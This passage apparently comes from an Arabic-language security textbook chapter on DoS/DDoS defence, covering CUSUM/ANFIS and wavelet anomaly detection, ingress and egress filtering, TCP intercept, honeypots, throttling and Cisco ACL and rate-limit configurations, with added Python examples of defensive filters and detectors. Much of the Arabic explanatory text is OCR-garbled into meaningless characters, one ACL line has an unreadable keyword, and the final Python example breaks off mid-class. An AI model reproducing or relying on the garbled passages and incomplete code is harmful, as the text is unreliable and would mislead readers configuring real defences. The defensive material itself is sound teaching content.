The ANFIS engine is driven by the CUSUM values, and its output is a fuzzy attack level that is defuzzified to a crisp value. The decision is taken on this defuzzified basis: the value is compared with the ranges for low, medium and high, which places the traffic in one of three situations and determines how the system reacts.

"LOW" attack level: the traffic is within the normal range; no alarm is raised.
"MEDIUM" attack level: the traffic deviates from the normal pattern but not enough to be declared an attack. In this case the system cannot be certain whether it is under attack or not, so it takes no defensive action, but it continues to monitor the traffic closely.
"HIGH" attack level: the traffic is classified as an attack and the defensive action is triggered, such as alerting the administrator and filtering the offending traffic.


Wavelet-Based Signal Analysis

"Wavelet analysis" describes an input signal, here a time series of a traffic measure such as packets per second, in terms of its spectral components. Classical Fourier analysis gives a "global frequency" description with "no time localization": it tells which frequencies are present in the signal as a whole but not when they occur. Wavelets provide a concurrent time and frequency description, so they determine the time at which certain frequency components are present and can isolate "time-localized anomalous signals". Analysing the energy of each spectral window of the traffic signal determines the presence of anomalies: a flooding attack changes the high-frequency energy of the traffic at a specific time, and so does a flash event, which makes wavelet analysis useful both for detecting attacks and other "time-localized signals" in network traffic and for locating them in time.

- Wavelet analysis describes an input signal in terms of spectral components.
- Analyzing each spectral window's energy determines the presence of anomalies.
- Wavelets provide for concurrent time and frequency description.
- They determine the time at which certain frequency components are present.
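An added Python example (not from the original text) of the time-localised energy analysis: a one-level Haar wavelet transform is applied to a constructed packets-per-second series, the energy of the detail coefficients is summed per window, and windows whose energy stands out against the median are reported as anomalous. The Haar wavelet, the window length, the energy rule and the series are assumptions.

```python
from __future__ import annotations

import math
from statistics import median


def haar_level(x: list[float]) -> tuple[list[float], list[float]]:
    """One level of the Haar DWT: approximation (pair averages) and detail (pair differences)."""
    approx = [(x[i] + x[i + 1]) / math.sqrt(2) for i in range(0, len(x) - 1, 2)]
    detail = [(x[i] - x[i + 1]) / math.sqrt(2) for i in range(0, len(x) - 1, 2)]
    return approx, detail


def detail_energy_per_window(series: list[float], window: int) -> list[float]:
    """Energy (sum of squared level-1 detail coefficients) of each window of `window`
    samples. A window of 2m samples gives m detail coefficients, so the energy is
    attributed to the time at which the high-frequency component occurred."""
    _, detail = haar_level(series)
    per = window // 2
    return [sum(d * d for d in detail[i:i + per]) for i in range(0, len(detail), per)]


def anomalous_windows(series: list[float], window: int = 8, factor: float = 5.0) -> list[int]:
    """Windows whose detail energy exceeds `factor` times the median energy (assumed rule)."""
    energies = detail_energy_per_window(series, window)
    baseline = median(energies)
    return [i for i, e in enumerate(energies) if e > factor * baseline]


def constructed_rate_series() -> list[float]:
    """Packets per second, 64 samples: steady ~100 pps with a burst at samples 40-47."""
    rate = [100.0 + (i % 2) for i in range(64)]
    for i in range(40, 48):
        rate[i] = 1000.0 + 300.0 * (i % 2)
    return rate


if __name__ == "__main__":
    s = constructed_rate_series()
    print(detail_energy_per_window(s, 8))
    print("anomalous windows:", anomalous_windows(s))
```

The burst occupies window 5 (samples 40 to 47), and only that window's detail energy rises; a Fourier transform of the whole series would show the same extra high-frequency energy but not which window it belongs to.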




10.8 DoS/DDoS Countermeasures

The strategies for countering DoS/DDoS attacks on the services offered by an organisation fall into three groups:

1. Absorb the attack
Use additional capacity to absorb the attack. This requires planning ahead, since the extra resources (bandwidth, servers) must be in place before the attack, and it costs money.

2. Degrade services
If it is impossible to keep all services running under attack, keep the "critical services" running and stop the others. This requires identifying the critical services in advance, designing the network so that they can be served separately, and shutting down the "noncritical services" during the attack so that their resources are released to the critical ones.

3. Shut down services
Shut down all services until the attack has subsided.

DoS Attack Countermeasures

Countermeasures against DDoS attacks can also be organised by the stage of the attack they address. The techniques for detecting and preventing DDoS attacks and their consequences fall under the following headings:

- "Protect secondary targets"
- "Neutralize handlers"
- "Prevent potential attacks"
- "Deflect attacks"
- "Mitigate attacks"
- "Post-attack forensics"



DoS/DDoS Countermeasures: Protect Secondary Victims

1. "Individual Users"
Individual users should protect their machines from becoming zombies (agents) in a DDoS attack; this protects the network as a whole, because a DDoS attack needs a large number of compromised machines and attackers can only recruit them when owners do not keep their systems secure. Users should install anti-virus and anti-Trojan software and keep it updated, since the agent software is usually planted by a Trojan; they should install the "patches" that close the vulnerabilities attackers use to take control of the machines; and they should watch their systems for unexpected outbound traffic, since an agent generates attack traffic when it is commanded to. Some systems now ship with built-in protection (a firewall and automatic updates), which raises the bar for attackers, but the awareness of users remains the decisive factor: a security-aware user notices unusual behaviour and does not run untrusted programs.

2. "Network Service Providers"
Network service providers can keep their customers' machines from being used as secondary victims by monitoring for attack traffic and by offering "dynamic pricing" of network usage: a customer whose machines generate an unexpected surge of traffic pays for it, which gives the customer an incentive to find and remove the agents running on them. Over time, pricing that reflects the traffic actually generated makes the customer the party with the strongest interest in keeping their machines clean, and thereby makes it harder for attackers to assemble a large attack network.

DoS/DDoS Countermeasures: Detect and Neutralize Handlers

A "Handler" is the intermediate machine through which the attacker controls a group of agents (zombies). Handlers are a weak point of the attack network: there are far fewer handlers than agents, and neutralising a single handler disables all the agents it controls, so locating and shutting down handlers is an effective countermeasure. Handlers can be detected from their traffic: by studying the communication protocols and traffic patterns between handlers and clients, or between handlers and agents, it is possible to identify the network nodes that are infected with a "DoS handler" or an "agent". Once found, the handlers have to be neutralised before the attack starts, which requires quick action; the attacker's network may be large, but each handler is usually a single compromised machine that its owner or provider can clean or disconnect, and doing so stops the DDoS attack before it begins.



DoS/DDoS Countermeasures: Detect Potential Attacks

Potential attacks can be detected and prevented at the network edge with three techniques: ingress filtering, egress filtering and TCP intercept.

1. Ingress filtering

"Ingress filtering" does not protect against attacks directly; it prevents packets carrying spoofed source addresses from entering the network. It is applied by the Internet service provider (ISP) to the traffic coming from its customers: the ISP knows which IP address prefixes are assigned to each customer, and the "ingress filtering rules" drop any packet whose source address does not belong to the prefixes of the link it arrived on. This makes it impossible for a customer's network to send packets with forged source addresses to the rest of the Internet, so attacks based on spoofing fail, and when an attack does occur the traffic can be traced back to its real origin. The rules are cheap to apply, because the filter only compares the source address with a short list of prefixes.

2. Egress filtering

In this technique the "IP packet headers" of the packets leaving the network are inspected to make sure that every packet carries a source address that belongs to the network it is leaving. A packet whose source address is outside the "sub-network" is not allowed out. Although egress filtering does not stop an attack by itself, it ensures that spoofed attack traffic does not leave the protected network, so that the network cannot be used as a launch point for DDoS attacks with forged source addresses, and so that any attack traffic still observed from the network can be attributed to its real source. Egress filtering is applied by the administrator of the sub-network at its border router.

These filters do not stop every attack: if the attacker uses a zero day attack, an "exploit" unknown to the vendor and circulating in the underground hacker community, or simply attacks from the genuine addresses of compromised machines, the filters let the traffic through, since the packets are not spoofed. Filtering is therefore necessary but not sufficient, and it must be combined with detection of the attack traffic itself, for example with the rate-based detection mechanisms described earlier.
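The two filters described above, as an added Python example (not from the original text): packets arriving from the customer link are checked the way an ISP does for ingress filtering (the same test a customer's border router applies for egress filtering), and packets arriving from the Internet are checked for sources that claim to be inside the customer prefix. The customer prefix, the bogon list and the traffic sample are constructed assumptions; the same rules are what an ACL on the border router would express.

```python
from __future__ import annotations

import ipaddress
from collections import Counter

CUSTOMER_PREFIX = ipaddress.ip_network("192.0.2.0/24")   # assumed customer allocation
BOGONS = [ipaddress.ip_network(p) for p in
          ("0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_bogon(addr) -> bool:
    return any(addr in net for net in BOGONS)


def filter_from_customer(src: str) -> tuple[str, str]:
    """Check on packets arriving from the customer link (ingress filtering at the ISP) or
    leaving the customer's border router (egress filtering): the source must be one of
    the customer's own addresses."""
    addr = ipaddress.ip_address(src)
    if is_bogon(addr):
        return "deny", "bogon source"
    if addr not in CUSTOMER_PREFIX:
        return "deny", "source not in customer prefix (spoofed)"
    return "permit", "ok"


def filter_from_internet(src: str) -> tuple[str, str]:
    """Check on packets arriving from the Internet towards the customer: a packet that
    claims a customer address as its source cannot legitimately come from outside."""
    addr = ipaddress.ip_address(src)
    if is_bogon(addr):
        return "deny", "bogon source"
    if addr in CUSTOMER_PREFIX:
        return "deny", "spoofed customer address from outside"
    return "permit", "ok"


def apply_filters(packets: list[tuple[str, str]]) -> Counter:
    """packets: (direction, source address). Returns counts of (direction, verdict, reason)."""
    out: Counter = Counter()
    for direction, src in packets:
        verdict, reason = (filter_from_customer(src) if direction == "from_customer"
                           else filter_from_internet(src))
        out[(direction, verdict, reason)] += 1
    return out


# Constructed traffic sample (not captured data).
SAMPLE = [("from_customer", "192.0.2.10"), ("from_customer", "192.0.2.11"),
          ("from_customer", "203.0.113.5"),     # spoofed; would feed a reflection attack
          ("from_customer", "10.1.2.3"),        # private source leaking out
          ("from_internet", "198.51.100.7"),
          ("from_internet", "192.0.2.10"),      # claims to be inside the customer network
          ("from_internet", "172.16.5.5")]

if __name__ == "__main__":
    for key, n in sorted(apply_filters(SAMPLE).items()):
        print(n, key)
```

The attack traffic that these rules cannot see is a flood from 198.51.100.7 itself: its source is genuine, so both filters permit it, which is the limitation noted above.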

3. TCP intercept

TCP intercept is a router feature that protects TCP servers from TCP SYN-flooding attacks. In a SYN flood the attacker sends a large number of connection requests (SYN packets) with unreachable or spoofed source addresses; the server replies with SYN/ACK and allocates state for each half-open connection, and because the acknowledgement that completes the handshake never arrives, the connection queue fills up with half-open connections. Legitimate users then cannot connect, because the server is no longer able to accept new connection requests, and a server with a full backlog appears to be down.

TCP intercept works by intercepting the SYN packets that match an "extended access list" before they reach the server. The router completes the three-way handshake with the client on behalf of the server, and only when the client has completed it does the router open a connection to the server and join the two half connections. Connection attempts from unreachable hosts never complete the handshake, so they never reach the server and the router drops them after a short timeout; TCP intercept thus filters out the bogus connection attempts and passes only genuine connections to the server. Because the router holds the half-open state instead of the server, the server's resources are not exhausted.

DoS/DDoS Countermeasures: Deflect Attacks

Systems that are set up with limited security, or that only appear to be vulnerable, can act as a lure for attackers; such systems are known as honeypots, and the effort an attacker spends on a honeypot is deflected from the real targets. Honeypots do not merely make attacks fail: they record the attacker's actions in detail, including the tools, the commands and the traffic patterns used, and this information can then be used to understand the attack and to tune the defences of the real systems. This is especially useful for DDoS: when an attacker tries to install a "handler" or an "agent" on the honeypot, the software can be captured and studied, which reveals the attack network and its control protocol, and the honeypot can be used to trace the attack back towards the attacker. In addition, the honeypot can be used to examine attack tools and to hold the attacker's attention while the defenders respond.

There are two kinds of honeypots:

- Low-interaction honeypots, which emulate only the services an attacker is likely to probe and therefore give the attacker little to do.
- High-interaction honeypots, which are real systems with complete operating systems and applications.

Honeynets are high-interaction honeypots in the form of a whole network of honeypots placed behind a gateway that captures and controls all traffic; they offer the attacker a realistic environment and therefore capture the most information, including the exact tools and techniques used.

KFSensor

http://www.keyfocus.net

KFSensor is a host-based intrusion detection system that acts as a honeypot: it attracts and detects attackers and worms by simulating vulnerable system services and Trojans. By emulating common network services it detects port scans and attacks against them, and it includes the means to detect and analyse DoS attacks against the emulated services, logging and alerting on every connection attempt.
[Screenshot: KFSensor Professional (evaluation trial) main window.]

DoS/DDoS Countermeasures: Mitigate Attacks

The effects of a DoS/DDoS attack can be reduced with the following techniques:

1. Load balancing
Providers can increase the "bandwidth" of critical links to absorb additional traffic during an attack, and a "replicated server model" can be used so that the load is spread across several servers and the failure of one of them does not stop the service. Load balancing also improves normal performance and makes the whole system more resilient.

2. Throttling
Min-max fair server-centric router throttles use the routers to limit the rate of incoming traffic to a level the server can handle: the routers upstream of the server throttle the traffic sent to it so that it is not overwhelmed, and the throttles can also be used to separate attack traffic from legitimate traffic. This technique is still at the experimental stage; its main drawback is false positives, where legitimate traffic is throttled or dropped along with the attack traffic. A simpler variant is to have the server or the router drop requests when the load increases, which likewise affects legitimate users.


Post-Attack Forensics

Post-attack forensics analyses the traffic captured during an attack in order to learn from it. Traffic pattern analysis of the attack data helps network administrators develop new filtering techniques that keep the same attack traffic from entering or leaving the network. DDoS attack traffic can be analysed for specific characteristics, such as packet sizes, port numbers, protocols and source addresses, and these characteristics are used to update the load balancing and throttling countermeasures and the signatures of the IDS. Event logs and captured packets should be stored so that the attack can be analysed later; they are also needed for IP traceback, in which the Internet service providers cooperate to trace the attack traffic back to its sources, and as evidence if the attack is prosecuted.

Run the Zombie Zapper Tool

Once an attack has been detected (by the IDS, by the administrator or from a victim's report) it is not easy to stop it, because the attacker is not directly involved: the agents keep flooding the victim as long as they are running. Zombie Zapper is a tool that can stop the flooding from zombie machines: it sends the agents the stop command they expect from their handler, so the agents cease the attack. The Zombie Zapper tool works against the agents of Trinoo, TFN, Shaft and Stacheldraht.



DoS/DDoS Countermeasures

- Use strong encryption mechanisms such as WPA2 and AES 256 for "broadband technology" networks with wireless access.
- Ensure that software and protocols are up to date, and scan the machines thoroughly to detect anomalous behaviour; a secure "routing protocol" is essential for multi-hop WMN (wireless mesh networks).
- Disable unused and insecure services, and block inbound traffic from "reflection servers" that can be abused to amplify attacks.
- Update the kernel to the latest release.
- Configure the firewall to deny external Internet Control Message Protocol (ICMP) traffic access, and ensure routers filter traffic at the ISP level.
- Use "cognitive radios" in the "physical layer" to handle jamming and scrambling attacks.
- Prevent the use of unnecessary functions such as gets and strcpy in programs.
- Secure remote administration and connectivity testing.
- "Prevent the return addresses from being overwritten".
- Perform thorough input validation, and prevent unnecessary data from being processed by the applications.
- Design the network to tolerate the failure of any single component and to absorb unexpected load.
DoS/DDoS Protection at the ISP Level

Source: http://www.cert.org

Most ISPs simply block all requests to the target during a DDoS attack, which denies even legitimate users access to the service. A better option is the "in-the-cloud DDoS protection" that ISPs offer for Internet links: the attack traffic is diverted to the ISP, which has the capacity to absorb and filter it, so that the customer's link is not saturated, and the cleaned traffic is sent back to the customer. Administrators can also ask the ISP to block the "original affected IP" address and move the site to a new IP address after DNS propagation, so that the attack traffic, which keeps targeting the old address, no longer reaches the service.

[Figure: between 1,000 and 100,000 bots flood the Internet backbone towards a customer behind a 128 kb link; the ISP filters the traffic before it reaches that link.]

Enabling TCP Intercept on Cisco IOS Software 



^j^il! 2^ j ^ <JU3I j*\ jVl ijajj ikJ jj TCP intercept u^3 







Command 


Purpose 




Step 1 


access-list access-list-number {deny 1 
permit} tcp any destination 
destination-wildcard 


Defines an IP extended access 
list 






Step 2 


ip tcp intercept list access-list- 
n umber 


Enables TCP Intercept. 



io^Ij&I aj^Ij! "access list" Jj^jli 3^15 

Sj^q cjKjui ^ 4_*iI3l tilt laaa (j^ljjc-l .2 

a ^ la o ^1 jail j-<JI tilt Laa (jlaljlicl .3 

(jjjj <j| U£ .ft^^ft fi\ ja. ji djlif^ "destination" ^ jll j "source" j^^Jl J j^a jJI s^lc j 
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g-iLJI s^aIAJI jj "active intercept mode" j^VI ^ j ^jj*^ j J**j J ^j^j TCP intercept 

f Cisco IOS Software j^i^ ^W^k 4^^ VI .^Ijj^VI ja ^.JaljjaVI ."passive watch mode" 

ACK of the SYN ^ 4 ACK and SYN * ^Lkll <> ^ ^V^ 1 J^J <(SYN) fcjljll JL^iVI c^UL ^ 
jj^^j _^LJI (^luaVI SYN ci^J^ 3 ^^Jl ajj^SII AaiL^a^ll iiii ^LjjJI jli 4 Jja»JI ACK . Jj-uJ! ^ 

."two-half connections" u^VI CjVL^jI iaj <$jS5151I <aiL^l l JLu£l 
:^VL£ ^1*11 ojj^ J TCP intercept mode t^j -W^ j-Vl 




Command                                     Purpose
ip tcp intercept mode {intercept | watch}   Sets the TCP intercept mode.




'Mitigating DoS" lhj^ *L 



Mitigating DoS using Access Control Lists (ACL) 
.djUjiVl a jW^ <J^ c> <ft <4j yr^ ^IjSII c> a^j*^ ^ "Access Control Lists" Jj^jll J <a£a^ll <ajlj3 

^ j*a^ L_flii j Jaj ^ "CisCO rOUters" J^H J J^ 3 J^ J ^aaal ! <ajl j3 (JjflaJ £ jjAall liA t-a^Jj 

.4 ill lilti £j^ j (J^.ta Jjj*^ jKj" 1 * W^' La£ 4^juill AjLaaJI 3_Aj\ill f>i& ja jj* TP ^ 

LoAic _ J ja.^1 ACL J lil jll XP ^ o-* 3 ^ 6 j'j^' ls^- ACL Jjjj^ LaAk. & JLl<JI J^f^ 
.l^jj jl jl^j ^11 reject j> accept 'deny <aliLx» cj! jba. jli * jjjI jll jl^ ^ ^j^jJI s^Ull ^ jaJI 

j-a .JjAslII JJ^-la J .A^JjaJl (j-a jjj!>Lall <jJajC j& ^a jjJl Cl3jl£U (_£j£ill J ja*-1I <jl 4,jLuiJ j tiLjl 4 joiajJl 4 j-nnl jJ IEEE^ 1 ^^ Lifl J 
4^juill pbl JJ^^J c5^JJ Lax t^U^ ^ ACL J ^ C5^^ '^J ACL ^1 j c flxjJall Jataj 

jIaj "ACL compressor" yr*J ^Lua!)U S % j^a ^ Liajl d^JI 11a ^JUj .I^jIc S jia^l < jt > ^1 1 ^ Jx^j ^UlUj 

^cjtlJl ^Jajj _4_i±j^)^j3l 4.1a ^Jajl L— La ill ( . lla ,CjWa3I (Jj^ ^jjj Jl jj V C5^^J ACL (Jj^^ ^ a cl>^ 

Aclja ^^kludj j^J t^jjJixJI 11a ^ .ACL compressor ^ h^'iui l lie. 4 c L^aj ^ La ACL -ja xjJ a j^j <jl <jjjj^j3I 

^Jc. <flJJJaJ ^JJ UaJ JJ j\ jll jxil jVI jia^J ^^-^-^ J <^ J^l^ 6 ^ cJ^-^j ^JJ J>(^11 j-a JJJ^ll ^J^- t — *S j A-JUll ACL 

m jj jljll I>ja j-<i ja5 *^jl jll jjj^ll ^j^- lS^ 

access-list 1 [keyword unreadable in source] 192.168.2.2
interface f0/1
 ip access-group 1 in

"Access list" *LSjI ^jj 4 j^l jVl j t> J UI -J^ 1 J^jU J^J^ "Conft" J jVl j*Vl ^ 

B lAiaUx j-d ^^ic l^jjjiaJ j 4 jjstxi jj jlj jl ^1 jj^ jll ^j| j3 ^j-d AjAslII ^Laul 1 1j£ ^J , 1 jA LiA j b,JC jj^ jll <Lajla ^.Uacl ^aJJ La£ 

j^Vl Llqa^LJ ajjI^jII Uaj^ .^j^UI cj! jjjijll JLk^jj JLk^V "Interface fO/1" j*Vl ^ 4dJLl3l jkJI ^ 

jljixJI ^ ip ^ ja. ^.lA^ Jalijajl ^jj cliia. FO/1 ^y^J^ ( ijj^n ^jij UjI Iaa ^^j^ 4 M jp access-group 1 in" 

.l^LULiI ^jj 192.168.2.0 c> u^^^ 5^ i> IP e> ^ * J^V 1 ^ .192.168.2.2 

jlaa. ^aJJ -C5 joijIjI ^a^La. ^1 <Jj^aJ ^a J^-ll A^Jjai Jjj* ^J^- C^l (j^ Oj^ 1 ^^ ACL J^ QJ« ^ '^ XJ ^ clA^ 

ACL J^ J U^^J c fljiaall b jlaaJl oAA cJ^'J J .4-^J <Jaij^3 jj^ jll laJ > oJ V o^Uacj ^aJJj LdLdJ 192.168.2.0 ^ J>^^ a£jjoi 

Cjia jj* jj^y^\ ^^>^- c l£^>^ JJ^>^^ ^^>^ L - J ^ j-^ j ^jL^j^j cl)^ ^Lijll <_£jj (jl ^Lua!>11 jjj-<JI j .Iaa ^ 

.ACL (i^j axj jjill 

Sac-Is ^1 J jj^a jll jjj^ta jjA 192.168.2.0 cl^ uj^ l$\ <j!VI ^ ^m^j 6Aa.lj Sjiij ^IUa jSIj 

^ 192.168.2.4 j 192.168.2.3 J ^ 192.168.2.2 jA ,>i3l ^jLj^VI L% ^ jll cAjLJI 

Jj^a ^IjILj .Aa>l g all 4_liijC. •Jj^a j* VAj ALala <aJjudl <-<iAaJl ^liu ^jSj I1a ACL r* J^* C5^^^J .^'■^-^ J JL^jVI ^jja>tjaJ (jJJC jjuj 
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.^aIaJIj (JL^jV! lj*-llalujJ V L- a jjuj Uiajl CjI^JjoJI £>A& ^jjA ja. jaII (jjJC jjoJI ^^Iasl!! 4 jAjj Lq (^C-J .^IaJI <aila»xJl 



m A alia &1I CjI^jjoJI CjLo^JI jjoilii L»Ajc jj^xiill ^-llaj t-^jj tUllld ^la. (Jj^j (jl Iaa (jli ^tllLj 

Mitigation using Rate limiting 

a!\A UUi J^j V "Rate limiting" ^11 '"Access Control Lists" Jj^jll ^ ^1 j3 ^ 

<L^)]a3l £>A& CjA^JcI ja* gall ^^Ic J^tS ^LJl (jj^J <»-fl JjuJ <^Hj JJJ-*H ^^>^ ^ ^ J^u> lAa. jl < aa..< £jJaj tdli (j-<* VAj .A-iajJall 

^j-Lcj V Ia& (j£l j .<L<iAaj| (j-a ^jIaII (jLa^aJI (j* a£jjoJI CjU ^^ij j tAjliil <Ulxi <jj£j (jl (j&^j <jV CjULjII ^^aLg th» ^ <Jja (j* 

Cjl a-\q\\ ASlAjI JJ^a 4-^^)^> (j* ^JWI ^1 jVI .tilli^ g a\\ ^aUaj <Jj3 (j* JJJ-^H ^^>^ A^aolLj (Jl jj V LJlia (JJ^J (jl 

<Ja.b ^IjAJ ^^1 JJ^H ^^>^> ^ fcJ - a ^ CS-^ A^JjaJl <J jjjoui (jl 4 J Vffll £>AgJ (JjJaSl .(j;i*-a (.£ jlLoua ^1 192.168.2.0 

AaJl (JAx^q j^ > nj > n (3flaJ .^LaJtx-aJl ojA9j ^LaJl IfrLaaJJ (jl (j^-oJ ^^jll Jj^all t^jjuall aa a (^^Ic AxUXJ Ia& JJJ-all (J-JJt-x» .A^Jjuall 

<j£^ Distributed Committed Access rate (DCAR) j Committed Access Rate (CAR) ^ ^ t> 

^AaJLaball ^y*\ jVI (j-a AjjojLojVI > *all (j* (j^l fc^UA .4 \^ ^ ^-^-1 J ^ 6J^U-all i _ 5 -i^ jl *^jl jll JJ^ll ^^>^ (^-^ -^1 (J-J^ ^1 

CjIjIjsII iUJl (ji*j -oli s^olS jjU-^ J IP # ."exceed action" j "conform action" yr*j 
(j£-<ua AaJI Ac I (jjflaj ^j^ajj drop ^continue 'allow 'deny ^^Jl ciiUlkioJ taaj cjljljlll < allkj _til3i ^^Jc <aSi^xJI 
U^*^ "show int rate-limit" j*Vl . >»ljVl <^lj ^ >»ljVl ^Ia^U c^j ^ ^ (^L^ill ^ J U^l 

.AaJt Jas-a jV ^LuiLuiVl ^iiJl Ul (jjlJJ /iiij.n (> JU1I ^jUjS) ^ojjII .<LILJI 5^1 jll cilli l^iifSaJ ^jII CAR J^>^ 

,4jj*-ft j (j^a CAR 4joj^ 3JI jl jl (jjiKM "no rate limit" jl "Rate limit" \ v^^j ^U^l J£jjJI (j^ U£ 

dAA ^ UAjc .SjjL-all jl *^jl jll Jj>oJl <^ ^ cj^alSI lWI ^1 ^ "output" J "input" ^JjaLiJ j]| CjUI^II 

IHaj ."access group" ^J^l ^Ia^I <"pre-configured access list" ^I^VI <^IS ^ s^clSlI 

jjA-g <Jj3 (jxi Jj^ll jAx-d AjAaJ (j-^-oj ."ACL index" ^*^l •-^11 jAx-d ^ -U^lun (jl (j-V^j ^(^Jall (jjoii j Ajj^-SI AjA^jI 

£AAa^a ( i a!£ "Burst maximum" j "Burst normal" .4 j ^IMI caj jIaLoj j>»VI Iaa < . ul a i oaja^j (j£-ojj a£jjuo!I 
(J^lault ^jj c aj£ "action" ^Kll (jli 4 6!>lcl j£i Lo£ j . Jl jl!l Jc ^j^ll (j-« j-ftlu^ ^AlSI Jc ialLaJI j jj^ll a£j^ cjUISj 

A m ^ <^.l j J ^Ld^Jl 

(j^ Uo jjlil li^lk ,AaJl ^jAsLxi j-dl jl I^Ia^JjojI (j^J ^11 ^istxi J£ 4 qjh j c *<1>^i1 ^11 j£jaiJjaj ^ j^ (j-d (^1^11 lS^^II (J JJ^^ll ^aAJ 

J CjI^ jll (j^» AjAxII jl 6Aa.l j 4j^jI Jc AiifSaJ (j£<u AaJl Jaslxj .^jUjuall j SjbVI J J^Vl J^ AaJI Jasl-g (oAflauoJl ^laAll CjUII 

oAkxlt <£aj^1I 



Keyword / argument              Description
input                           Applies this CAR traffic policy to packets received on this input interface.
output                          Applies this CAR traffic policy to packets sent on this output interface.
dscp                            (Optional) Allows the rate limit to be applied to any packet matching a specified differentiated services code point (DSCP).
dscp-value                      (Optional) The DSCP number; values are 0 to 63.
access-group                    (Optional) Applies this CAR traffic policy to the specified access list.
rate-limit                      (Optional) The access list is a rate-limit access list.
acl-index                       (Optional) Access list number.
bps                             Average rate, in bits per second (bps). The value must be in increments of 8 kbps.
burst-normal                    Normal burst size, in bytes. The minimum value is bps divided by 2000.
burst-max                       Excess burst size, in bytes.
conform-action conform-action   Action to take on packets that conform to the specified rate limit. Specify one of the following keywords:
                                continue: Evaluates the next rate-limit command.
                                drop: Drops the packet.
                                set-dscp-continue: Sets the differentiated services code point (DSCP) (0 to 63) and evaluates the next rate-limit command.
                                set-dscp-transmit: Sends the DSCP and transmits the packet.
                                set-mpls-exp-continue: Sets the MPLS experimental bits (0 to 7) and evaluates the next rate-limit command.
                                set-mpls-exp-transmit: Sets the MPLS experimental bits (0 to 7) and sends the packet.
                                set-prec-continue: Sets the IP precedence (0 to 7) and evaluates the next rate-limit command.



Source: http://www.cisco.com/c/en/us/td/docs/ios/12_2/qos/command/reference/fqos_r/qrfcmd8.html
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."ijq'n aJJ 4 > >n > >1 (Jjfl ^ja all d^Ic^I J-aljVI (J^& 4-9j*-all aI^^JjojLj 

rate-limit input 8000 2000 4000 conform-action transmit exceed-action drop 

FO/1 J) J J^"^ ^ ^ .(J J^ J^ J* (J^f^ '^ c * 4_x»l,l^Jjull ^aJ ^I^Vl £J^a jl J-^jljH ( ; ^Vj JjVl J-*VI 

La£ jjj^ -J ajuj j^ ^—^j*-^ ^3 ^ qVi^ a\\ djl^jjoJI ^j-<i j\\ jjj-<J1 4^j^> J^ L - c . 1 >j ^ intfO/1 ,>*VI ^al^vimlj 

liA J ^^klaiJI ^Lk Jj£ <> ^ j A^l^l J clu 8000 

W j^ jo^ fc* ijuJJS\ jj>« ja c^ill j CjjU 4000 burst maximum ^ ^.j^ f% .f j**^ 8500bps 

,4_jiiL<Jl ialLajj ^jjj £>i& A£jjoJ| Jj^a 4-^J^> (J^j ^ ■ t — ^J-^j 

192.168.2.2 < jj^l tiA J .^SU t*BiS j ^AajjJI Jtkill o^j^ jA* 5 J <-M uj^ u' ^ ^ .cSj^Vl 

.192.168.3.0 



Combining Rate limit and Access Control features 

^^lll CIjV jJ J^>J^ (j-Q fi^J^. <c ^ Jj£jaLi3 <Ja*-<J! Aa. j <J jj^ jib ^aall ^jI j3 £a^13 ^a^L* LiA jjjouJI JJ^>^ ^^>^ 
^jJal jll 4<J£joJ! li^ ,*L<»^JI ^j-d (jLa^pJ! 4jjL^<J jJjllLoj J£ (Jjxjoij ^5-!^^ <J£juo3I t *° - ,(JjJaal cJ^*^ JJJ - ^^ ^^>^ (3^^ 

^ ^ill ^ jll ^i^J! t^lSjill ^ ^ u^J! c> .192.168.3.0 192.168.2.0 492.168.1.0 ^ ci3U J 

.192.168.2.1 j* fteJ! 

<JUi ^1 jll ^ <Ljia3l . j^jolloj jjll ^ "ACL rules" ^ ^ j?^^ ^ ^^i^JI JjVl <Ljla3l 
^ 192.168.2.3 j 192.168.2.2 j^VI < ku^lt jl ^ J -uli tcilli ^ j .J^IHIj 4^1^ <> cJia jj l^V 

/ alia CjI^jjuoII ^^j^j^II jjoilii Cliia 4x. j^ll U^J^ 

<J ^Ja^xi ^ CjI^JjuoII ^-Ia^J (iljjjLa ^A^a (j^flaJ ^aJJ ^j£l! (J^*-a ^lllaJ I^jS ^aJ 4il J^l^ J^juoII l^jJajJ c _^j3Ij 4_ijlil3l <aj^JaJl 

^a Jlxi ^^jJaUJl CjVI^JI dljl£ ,Cjl£jjaill Jc Uiajl (3flaJ (j^lj 4 ijt ^ <£jjai ^j-d JJ^l^ ^^>^ L - J^l^ I^A . JJjl^)li 

4jLa^. Ajjilll oi^J (j^j JUlUj jl jjJaV A^fuJI dbJa^su JUlUj a^I^aII j^a^j ^alc Jc ^1 L ^&\j Burma DDoS 

,Ljaj| (JJJC JjuJI ^^IaslII J j*l^<i cJ J ^-^jj PDoS l— ib&^J A-iajJa l^j j£ ^j-d 
^aJl C1jL^ij-<JI j J jj^a jll ^aall J£ ^ahViml ^aJJ liA . JjJail ^lij <A\ ^-UacV <LLuJ! djUjiill ^ £^0* <— lSIUS^ ^Lul! ^ajajjll 

_(Jjj^ajll 




APPLYING ACCESS 
CONTROT LIST 



^C'L applied on the attacking 
network 19^.1<SS.^.O 




192.168.2.1 fATTACKER) 
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





access-list 1 permit 192.168.2.1
int f0/1
 ip access-group 1 in
int f0/1
 rate-limit input access-group 1 8000 2000 4000 conform-action transmit exceed-action drop

ip access-list extended Client2Server
 permit ip host 192.168.2.1 host 10.0.0.1
class-map match-any Client2Server
 match access-group name Client2Server
policy-map CAR
 class Client2Server
  police 8000 4000 2000 conform-action transmit exceed-action drop
!
interface FastEthernet0/1
 service-policy input CAR

fj* > ^ J^h Policy map j Class map ajj^JI cj! JjJ! jjjSI ljjL&I li* ^-^j 

CjIj CjIjI jail iLaj) j A-ia. jj3I fjA Jl^c-Vl Jj3 Lu> 
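To make the combined rule concrete, here is an added Python simulation (not the book's or Cisco's code) of the ACL plus CAR policer above: only traffic matching access-list 1 (the attacking host 192.168.2.1) is fed through the 8000 bps / 2000-byte token bucket, while the legitimate 192.168.3.x hosts pass untouched. It assumes a plain token bucket and does not model Cisco's burst-max extended burst; the packet list is constructed.

```python
"""Added example (not Cisco's code): the combined ACL + CAR rule above,
    access-list 1 permit 192.168.2.1
    rate-limit input access-group 1 8000 2000 4000 conform-action transmit exceed-action drop
as a token bucket of depth burst-normal (2000 bytes) refilled at 8000 bps.
Assumption: Cisco's extended burst (burst-max, probabilistic drop) is not
modelled; packets beyond burst-normal are dropped. Traffic is constructed."""
from ipaddress import ip_address, ip_network

class CarPolicer:
    """Token-bucket policer: conform -> transmit, exceed -> drop."""
    def __init__(self, bps: int, burst_normal: int) -> None:
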